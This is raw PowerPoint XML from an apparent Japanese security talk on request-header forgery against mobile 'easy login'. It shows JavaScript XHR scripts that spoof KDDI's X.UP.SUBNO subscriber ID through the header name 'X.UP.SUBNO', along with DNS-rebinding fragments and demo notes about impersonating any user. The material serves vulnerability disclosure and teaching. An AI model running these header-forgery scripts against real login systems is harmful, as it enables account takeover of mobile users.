              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(null);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}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setTimeout(trap, 60000); // 60</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>秒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>…DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>のキャッシュタイムアウトを狙う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&lt;/script&gt;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ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;div id="result"&gt;&lt;/div&gt;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kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000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攻撃デモ（世界初公開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*1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean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9" name="図 18" descr="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747" y="1325419"/>
            <a:ext cx="6000750" cy="5095875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="図 19" descr="2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747" y="1325419"/>
            <a:ext cx="6000750" cy="5095875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="図 20" descr="3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747" y="1325419"/>
            <a:ext cx="6000750" cy="5095875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="図 21" descr="4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747" y="1325419"/>
            <a:ext cx="6000750" cy="5095875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="図 22" descr="5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747" y="1325419"/>
            <a:ext cx="6000750" cy="5095875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="図 23" descr="6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747" y="1325419"/>
            <a:ext cx="6000750" cy="5095875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="図 24" descr="7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0747" y="1325419"/>
            <a:ext cx="6000750" cy="5095875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="図 25" descr="8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0747" y="1325419"/>
            <a:ext cx="6000750" cy="5095875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="図 26" descr="9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0747" y="1325419"/>
            <a:ext cx="6000750" cy="5095875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="00030a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6316676" y="839627"/>
            <a:ext cx="3619500" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="フッター プレースホルダ 1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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Copyright © 2008-2012 HASH Consulting Corp.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78781" y="6743700"/>
            <a:ext cx="280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*1 HASH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コンサルティング株式会社調べ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次の話題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とくまるひろしの</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>リクエストヘッダ書き換え攻撃入門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話は、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月にさかのぼる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今日は、防御の話はしません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au</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>の新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>GW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>の情報</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="図 5" descr="newgw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77" y="1842179"/>
            <a:ext cx="9830171" cy="2468563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 bwMode="auto">
          <a:xfrm>
            <a:off x="542611" y="3727938"/>
            <a:ext cx="5848141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正方形/長方形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367597" y="4369142"/>
            <a:ext cx="9319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archive.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>より引用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0" smtClean="0"/>
              <a:t>http://web.archive.org/web/20110708071509/http://www.au.kddi.com/ezfactory/</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="16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日記書いた</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>(2011/6/15)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="図 3" descr="ockeghem-di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62" y="865187"/>
            <a:ext cx="8496300" cy="5829300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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EZ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>ブラウザは</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>非対応だが、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>PCSV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JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>が使える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mtClean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XHR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setRequestHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>で、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User-Agent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X-UP-SUBNO</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>を偽装できるのでは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だが、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>KDDI</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>さんの</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>ことだから、そんなに単純な脆弱性はないだろう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 lIns="72000" tIns="36000"/>
          <a:lstStyle/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var requester = new XMLHttpRequest();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requester.open('GET', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2200" smtClean="0"/>
              <a:t>://example.com/login.php', true);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requester.onreadystatechange = function() {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   if (requester.readyState == 4) {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       onloaded(requester);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   }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};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requester.setRequestHeader("Host", "twtr.com");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requester.setRequestHeader("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User_Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2200" smtClean="0"/>
              <a:t>", "SoftBank/1.0/943SH/SHJ001/SN359XXXXXXXXXXX0 "  +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     " Browser/NetFront/3.5 Profile/MIDP-2.0 Configuration/CLDC-1.1");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requester.setRequestHeader(</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="2200" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2200" smtClean="0"/>
              <a:t>　　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2200" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X_JPHONE_UID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2200" smtClean="0"/>
              <a:t>", "a3XXXXXXXXXXXXXP");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smtClean="0"/>
              <a:t>requester.send(null);</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="22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SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>を利用したリクエストヘッダ改変スクリプトの例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96343" y="6815818"/>
            <a:ext cx="288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WASF2010</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>の講演資料より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HTTP_USER_AGENT=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DoCoMo/2.1 P07A3(c500;TB;W24H15)Fake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SERVER_NAME=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>twitter.com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SERVER_PORT=443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HTTP_COOKIE=aaa=bbbx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REMOTE_ADDR=123.108.237.4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SERVER_PROTOCOL=HTTP/1.1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HTTP_X_JPHONE_UID=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fakejphoneuid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HTTP_X_DCMGUID=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fakedcmguid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HTTP_X_UP_SUBNO=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fakesubno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HTTP_HOST=twitter.com</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2200" dirty="0" smtClean="0"/>
              <a:t>※URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>と証明書のドメインが異なるので警告が出るが、処理は続行可能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2200" dirty="0" smtClean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アプリケーションが受け取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>った</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>リクエストの例（一部）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96343" y="6787243"/>
            <a:ext cx="288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WASF2010</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>の講演資料より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Copyright © 2008-2012 HASH Consulting Corp.</a:t>
            </a:r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この手が使えないか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wktk</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>して端末の発売を待つ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アドレスの発表来た</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>(2011/9/28)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="図 5" descr="ip-addr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87" y="788986"/>
            <a:ext cx="8770938" cy="6019271"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="スライド番号プレースホルダ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281959" y="7220330"/>
            <a:ext cx="6965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http://megalodon.jp/2011-0928-2337-21/www.au.kddi.com/ezfactory/tec/spec/ezsava_ip.html</a:t>
            </a:r>
            <a:endParaRPr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話題は「かんたんログイン」攻撃方法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4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F001</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>購入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>(2011/11/10)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="図 3" descr="f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75" y="1484312"/>
            <a:ext cx="9134475" cy="4591050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="爆発 2 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="133350" y="1447800"/>
            <a:ext cx="3629025" cy="962026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この機種です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126095" y="7160356"/>
            <a:ext cx="6997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http://www.au.kddi.com/seihin/ichiran/mobilephone/f001/index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> より引用</a:t>
            </a:r>
            <a:endParaRPr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User_Agent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X_UP_SUBNO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>は</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>ブロックされていた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KDDI</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>やるな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その日はあきらめて寝た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翌早朝、海老原昂輔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>(@co3k)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>さんから、突破できた旨連絡をもらう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9154" name="Picture 2" descr="http://a0.twimg.com/profile_images/1273579912/ebihara-150x150-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922" y="3996731"/>
            <a:ext cx="2989559" cy="2989559"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic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X_UP_SUBNO</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>ではなく、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>X.UP.SUBNO</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>だと突破可能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こうなっていた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dirty="0" smtClean="0"/>
              <a:t>サーバーに送られるヘッダ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP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User-Agent: Mozilla/5.0 Opera/9.80 (KDDI-FJ31; BREW; Opera </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mobi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; U; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) Presto/2.4.18 Version/10.00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dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User.Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: KDDI-FJ31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UP.Browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/6.2_7.2.7.1.K.8.160 (GUI) MMP/2.0</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X.UP.SUBNO: 05099999999999_vi.ezweb.ne.jp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ja-JP" alt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dirty="0" smtClean="0"/>
              <a:t>CGI/PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>が環境変数として受け取るヘッダ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP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HTTP_USER_AGENT: KDDI-FJ31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UP.Browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/6.2_7.2.7.1.K.8.160 (GUI) MMP/2.0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HTTP_X_UP_SUBNO: 05099999999999_vi.ezweb.ne.jp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攻撃スクリプトを作成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000" dirty="0" smtClean="0"/>
              <a:t>var requester = new XMLHttpRequest();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000" dirty="0" err="1" smtClean="0"/>
              <a:t>requester.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>('GET', 'login.php', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>);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000" dirty="0" err="1" smtClean="0"/>
              <a:t>requester.setRequestHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>X.UP.SUBNO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>", "05099999999999_vi.ezweb.ne.jp");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000" dirty="0" err="1" smtClean="0"/>
              <a:t>requester.setRequestHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0"/>
              <a:t>User.Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”, “KDDI-FJ31 :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>UP.Browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/6.2_7.2.7.1. K.8.160 (GUI) MMP/2.0");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000" dirty="0" err="1" smtClean="0"/>
              <a:t>requester.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(null);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000" dirty="0" smtClean="0"/>
              <a:t>alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>requester.responseText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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85227" y="3848519"/>
            <a:ext cx="7918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これを</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0"/>
              <a:t>PCSV(Opera)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>のアドレスバーから実行する</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>（実際には改行なし）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>アドレスバーから実行すると、非同期通信は使えないようで、同期通信にした</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>能動的攻撃が可能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>　　→ ケータイ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>が分かれば任意のユーザに成りすまし可能</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400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Demo(PCSV</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>からのかんたんログイン</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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00022a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40063" y="875579"/>
            <a:ext cx="4000500" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Copyright © 2008-2012 HASH Consulting Corp.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Demo(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻撃</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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6" name="00024a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35313" y="1208088"/>
            <a:ext cx="3810000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Copyright © 2008-2012 HASH Consulting Corp.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時系列のまとめ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 smtClean="0"/>
              <a:t>9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28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水</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>秋冬モデルより</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>EZweb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>と</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>PCSV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IP</a:t>
            </a:r>
            <a:r>
